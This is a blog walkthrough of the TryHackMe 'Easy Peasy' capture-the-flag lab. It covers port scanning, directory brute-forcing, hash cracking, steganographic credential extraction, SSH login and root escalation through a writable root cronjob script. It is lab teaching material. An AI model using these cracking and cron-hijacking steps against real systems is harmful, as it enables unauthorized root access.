TryHackMe: Easy Peasy

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Easy Peasy challenge.

Room: https://tryhackme.com/room/easypeasyctf
Level: Easy

Task: Use your skills to access the user and root account!

Here is the first look of the webpage. Nothing special here I think. From the wappalyzer extension, the version of the nginx running is 1.16.1.

Lets fast scan the IP using nmap

# nmap -A -T4 10.10.124.84
.....
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
.....

There is only 1 port exist — 80/tcp but unfortunately its a wrong answer. We only by default on 0–1000 ports. It must be large range of port. So scan all the way then from range 1000–65535 port. This scan takes about 1 hour, grab a coffee first ☕

# nmap -p 1000-65535 -sV -A -T4 10.10.124.84
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
| 256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_ 256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-title: Apache2 Debian Default Page: It works

Now, there is in total 3 port open — 80, 6498 and 65524 and there is 2 http service running, nginx and apache

http://10.10.X.X:80 →nginx (1.16.1)
http://10.10.X.X:65524 →apache (2.4.43)

Now I need to find the flag 1. I planed to brute port 80 first. By using gobuster

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.124.84 -t 40
...
/hidden (Status: 301)
...

Only 1 path found. Lets headed to the page

There is no hint here even at the code. Might have hint in the image maybe? Using stegahide,

# steghide extract -sf ~/lost-places-1928727_960_720.jpg

No luck here. Hmm. Retry one more time using gobuster from this page

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.124.84/hidden -t 40
...
/whatever (Status: 301)
...

Only 1 path found. Lets headed to the page

There is some kind of encryption in the code. Its look like base64 to me

# echo "ZmxhZ3XXXXXX19mbDRnfQ==" | base64 --decode
XXXX{f1rs7_fl4g}

Now flag 1 is found! 👍

Now flag 2. So far there no other path found. From the last page, tried to extract any info from the image.

# steghide extract -sf ~/norway-772991_960_720.jpg

Still no luck. There is another http port 65524. So open the webpage

Luckily, flag number 3 is hidden here. 😂 Done 3rd flag.

Now, still pending 2nd flag. I tried to inspect the page to see any hidden message or hint

So here it is. “its encoded with ba….” base64? base32? Using cyberchef,

Using base62 decoder, its a path and its the 4th flag 😂. 2nd flag still not solve yet…. So I use the brute process using gobuster from http://10.10.X.X:65524/

# gobuster dir -w ~/wordlists/dirb/common.txt -u http://10.10.X.X:65524 -t 40
/.htaccess (Status: 403) /.htpasswd (Status: 403) /.hta (Status: 403) /index.html (Status: 200) /robots.txt (Status: 200) /server-status (Status: 403)

Only 2 with status 200. Ignore the index.html because its the current page. So lets see robots.txt

From the User-Agent, it is the MD5 hash. If refer to the placeholder in question ****{**************}, its must not exist in any dictionary. If brute force, maybe till the end of world would not finish 😅

I decide to try several online md5 decoder

So much of a hassle here. Now finally get the 2nd flag.

Okay now.. from the 4th flag, open the webpage. Its has matrix wallpaper and floating image at the top center. When inspect the code, there is a hash

Using hash analyzer, its a SHA-256. So I can use hashcat to decode it

# hashcat -m 1400 "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" ~/easypeasy.txt --force

No luck! Lets take a look the hint, it says GOST. From the hashcat,

# hashcat -h | grep "GOST"                                                                                                                                                                                 6900 | GOST R 34.11-94                                  | Raw Hash                                                                                                                                                                          11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash                                                                                                                                                                          11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash

Lets try 6900

# hashcat -m 6900 "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" ~/easypeasy.txt --force940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81:XXXXXXXXXXXXXXXXXXXXXXX

Alright! Got the 5th flag. So now, dead end again. Then, I remember that the hidden web page contain 2 images. Lets extract if anything contain from the images

# steghide extract -sf matrix-.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
# steghide extract -sf binarycodepixabay.jpg
Enter passphrase:
wrote extracted data to "secrettext.txt".
# cat secrettext.txt
username:XXXXXXX
password:01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 XXXXXXXX 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 XXXXXXXX 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 XXXXXXXX

So its look like we found credentials for SSH. The password is encrypted by binary. Using cyberchef to decode it.

After that, access the SSH

# ssh XXXXXX@10.10.X.X -p 6498                                                                                                                                                                                                   
The authenticity of host '[10.10.X.X]:6498 ([10.10.X.X]:6498)' can't be established.
ECDSA key fingerprint is SHA256:hnBqxfTM/MVZzdifMyu9Ww1bCVbnzSpnrdtDQN6zSek.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.X.X]:6498' (ECDSA) to the list of known hosts.
********************************************************************
** This connection are monitored by government offical **
** Please disconnect if you are not authorized **
** A lawsuit will be filed against you if the law is not followed **
********************************************************************
XXXXXX@10.10.X.X's password:
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
XXXXXX@kral4-PC:~$

So gain access is working, now need to capture the next flag.

# ls -al
total 40
drwxr-xr-x 5 boring boring 4096 Jun 15 2020 .
drwxr-xr-x 3 root root 4096 Jun 14 2020 ..
-rw------- 1 boring boring 2 Mar 3 23:36 .bash_history
-rw-r--r-- 1 boring boring 220 Jun 14 2020 .bash_logout
-rw-r--r-- 1 boring boring 3130 Jun 15 2020 .bashrc
drwx------ 2 boring boring 4096 Jun 14 2020 .cache
drwx------ 3 boring boring 4096 Jun 14 2020 .gnupg
drwxrwxr-x 3 boring boring 4096 Jun 14 2020 .local
-rw-r--r-- 1 boring boring 807 Jun 14 2020 .profile
-rw-r--r-- 1 boring boring 83 Jun 14 2020 user.txt

There is user.txt. Lets see

# cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}

When its say rotate, it might be ROT family. Using cyberchef again, now the 6th flag is captured.

XXXX{n0wits33msXXXXXX}

The last one.. capture the root.txt

“You Have 1 Minute Before AC-130 Starts Firing” → I feel like its a cronjob. I started look a round

# crontab -e
# cat /etc/crontab
....
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
...

There is a hidden shell script runs every 1 minutes located in /var/www

# ls -al /var/www
...
-rwxr-xr-x 1 XXXXXX XXXXXX 33 Jun 14 2020 .mysecretcronjob.sh
...

The shell script is belongs to XXXXXX. Ha!. I can simply wrote a command in it to again access to root files

# nano .mysecrectcronjob.sh
ls -al /root > /root_dir.txt

Lets wait for a while

# cat /root_dir.txt
...
-rw-r--r-- 1 root root 39 Jun 15 2020 .root.txt

Now we know where is the final flag located. So edit the shell again and wait for a while

# nano .mysecrectcronjob.sh
cat /root/.root.txt > /root_flag.txt
# cat /root_flag.txt
flag{63a9f0ea7bb98050796b649e854CCCCC}

Now Yeah! Mission completed!!

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store